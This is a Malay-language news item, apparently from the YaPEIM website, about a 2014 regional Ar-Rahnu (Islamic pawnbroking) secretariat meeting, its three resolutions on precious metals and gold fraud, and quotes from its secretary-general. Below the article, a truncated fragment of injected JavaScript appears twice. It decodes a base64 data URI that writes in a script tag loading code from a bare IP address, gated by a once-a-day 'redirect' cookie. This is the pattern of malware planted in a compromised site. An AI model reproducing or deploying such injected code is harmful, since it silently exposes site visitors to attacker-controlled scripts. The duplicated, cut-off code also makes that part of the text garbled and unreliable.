YaPEIM » Secretariat Ar-Rahnu Serantau 2014 Hasilkan 3 Resolusi

Terkini

Secretariat Ar-Rahnu Serantau 2014 Hasilkan 3 Resolusi

Sekretariat Ar Rahnu Serantau (SARS) 2014 yang pertama kali bersidang di sini tahun ini membabitkan enam negara.

KUALA LUMPUR:  Sekretariat Ar Rahnu Serantau (SARS) 2014 yang pertama kali bersidang di sini tahun ini membabitkan enam negara dalam penawaran skim mikro kredit ar rahnu atau pergadaian syariah bersetuju dengan tiga resolusi.

Anggota berkenaan iaitu Brunai, Indonesia, Thailand, Kemboja, Timor Leste dan Malaysia memutuskan tiga resolusi berikut:

i) Anggota Persidangan Sekretariat Ar Rahnu Serantau digalakkan untuk mengenal pasti potensi logam bernilai yang lain selain daripada emas yang boleh digunakan sebagai barang gadaian;

ii) Membantu negara-negara anggota Persidangan Sekretariat Ar Rahnu Serantau membekal dan menjual mineral bernilai khususnya emas ke negara-negara yang memerlukannya dari kalangan negara Anggota Persidangan Sekretariat Ar Rahnu Serantau.

iii) Memperkukuhkan penggunaan teknologi terkini dan termaju dalam menangani pemalsuan dan penipuan barangan kemas khususnya yang diperbuat daripada emas.

Setiausaha Agung SARS, Datuk Abdul Malek Awang Kechil, berkata program mikro kredit ar rahnu semakin mendapat sambutan menggalakkan di Asia Tenggara yang memerlukan penambahbaikan untuk memastikan industri ini terus subur.

Beliau yang juga Presiden dan Pengerusi Lembaga Pemegang Amanah Yayasan Pembanguan Ekonomi Islam Malaysia (YaPEIM) yakin dengan perkembangan dalam penyelidikan dan pembangunan teknologi emas, penipuan dapat dielakkan.

“Usaha penyelidikan dan pembangunan teknologi termaju dalam mengatasi masalah-masalah penipuan emas yang semakin serius di rantau ini harus diteruskan secara khusus di kalangan Negara Anggota Persidangan Sekretariat Ar Rahnu Serantau.

” Langkah-langkah yang dinyatakan ini adalah bagi memperkukuh kelestarian industri ini di  Rantau Asia Tenggara,” katanya, di sini semalam.

Abd Malek mempengerusikan persidangan SARS yang turut dihadiri oleh Senator Vann Math dari Kemboja, Rosminah Abdul Wahid (Brunai), Abdul Rahman Ismail Dewani (Thailand), Drs Deddy Kurdedi (Indonesia) dan Datuk Abibullah Samsudin, Ketua Pengarah YaPEIM.

Beliau berkata, program pergadaian syariah akan terus menjadi wahana yang penting dalam menawarkan perkhidmatan kepada masyarakat di rantau ini yang memerlukan penerokaan ke arah mempelbagaikan mineral bernilai yang boleh dijadikan cagaran kepada industri ini

“Penerokaan juga termasuk mencari kaedah supaya mineral bernilai daripada negara Anggota Persidangan Sekretariat Ar Rahnu Serantau dapat dibekalkan ke negara-negara yang memerlukan dari kalangan negara-negara Anggota Persidangan Sekretariat Ar Rahnu Serantau yang lain dengan mengambil kira aspek perundangan yang relevan,” katanya.

([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”

(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”

Top

Comments are closed.

Top